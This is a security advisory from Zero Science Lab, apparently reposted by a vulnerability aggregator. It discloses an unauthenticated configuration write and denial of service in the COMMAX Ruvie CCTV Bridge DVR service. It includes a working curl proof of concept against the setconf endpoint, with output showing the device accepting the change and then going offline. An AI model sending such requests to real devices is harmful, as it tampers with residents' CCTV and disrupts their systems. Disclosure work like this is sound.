Lucene search

K
zeroscienceGjoko KrsticZSL-2021-5666
HistoryAug 15, 2021 - 12:00 a.m.

COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS

2021-08-1500:00:00
Gjoko Krstic
zeroscience.mk
392
commax smart home. iot. apartment complex. unauthenticated access. dvr configuration. data manipulation. dos. vulnerability. zero science lab. advisory. impact. risk. exploit. zsl-2021-5666. vendor. contacted. public release. cctv. bridge dvr. service. configuration. denial-of-service. advisory id. manipulation of data. test. references. changelog. contact.

AI Score

7.4

Confidence

Low

Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS
Advisory ID: ZSL-2021-5666
Type: Local/Remote
Impact: Manipulation of Data, DoS
Risk: (4/5)
Release Date: 15.08.2021

Summary

COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety.

Description

The application allows an unauthenticated attacker to change the configuration of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint.

Vendor

COMMAX Co., Ltd. - <https://www.commax.com>

Affected Version

N/A

Tested On

GoAhead-Webs

Vendor Status

[02.08.2021] Vulnerability discovered.
[03.08.2021] Vendor contacted.
[04.08.2021] Vendor contacted.
[05.08.2021] No response from the vendor.
[06.08.2021] Vendor contacted.
[14.08.2021] No response from the vendor.
[15.08.2021] Public security advisory released.

PoC

commax_cctvwrite.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php&gt;
[2] <https://www.exploit-db.com/exploits/50209&gt;
[3] <https://packetstormsecurity.com/files/163852&gt;
[4] <https://cxsecurity.com/issue/WLB-2021080066&gt;
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/207573&gt;

Changelog

[15.08.2021] - Initial release
[23.08.2021] - Added reference [2], [3], [4] and [5]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS


Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a

Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.

Desc: The application allows an unauthenticated attacker to change the configuration
of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5666
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php


02.08.2021

--


#1

$ curl -X POST http://192.168.1.1:8086/goform/setconf --data"manufacturer=Commax&amp;Ch0=0&amp;dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&amp;dvr1=&amp;dvr2=&amp;dvr3=&amp;dvr4=&amp;dvr5=&amp;dvr6=&amp;dvr7=&amp;dvr8=&amp;dvr9=&amp;dvr10=&amp;dvr11=&amp;dvr12=&amp;dvr13=&amp;dvr14=&amp;dvr15=&amp;dvr16=&amp;dvr17=&amp;dvr18=&amp;dvr19=&amp;dvr20=&amp;dvr21=&amp;dvr22=&amp;dvr23=&amp;ok=OK"

*   Trying 192.168.1.1...
* TCP_NODELAY set
* Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0)
&gt; POST /goform/setconf HTTP/1.1
&gt; Host: 192.168.1.1:8086
&gt; User-Agent: curl/7.55.1
&gt; Accept: */*
&gt; Content-Length: 257
&gt; Content-Type: application/x-www-form-urlencoded
&gt;
* upload completely sent off: 257 out of 257 bytes
* HTTP 1.0, assume close after body
&lt; HTTP/1.0 200 OK
&lt; Server: GoAhead-Webs
&lt; Pragma: no-cache
&lt; Cache-control: no-cache
&lt; Content-Type: text/html
&lt;

<br/><br/></p><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html><html><p>
* Closing connection 0

#2

$ curl -v http://192.168.1.1:8086
* Rebuilt URL to: http://192.168.1.1:8086/
*   Trying 192.168.1.1...
* TCP_NODELAY set
* connect to 192.168.1.1 port 8086 failed: Connection refused
* Failed to connect to 192.168.1.1 port 8086: Connection refused
* Closing connection 0
curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused
</p></html>

AI Score

7.4

Confidence

Low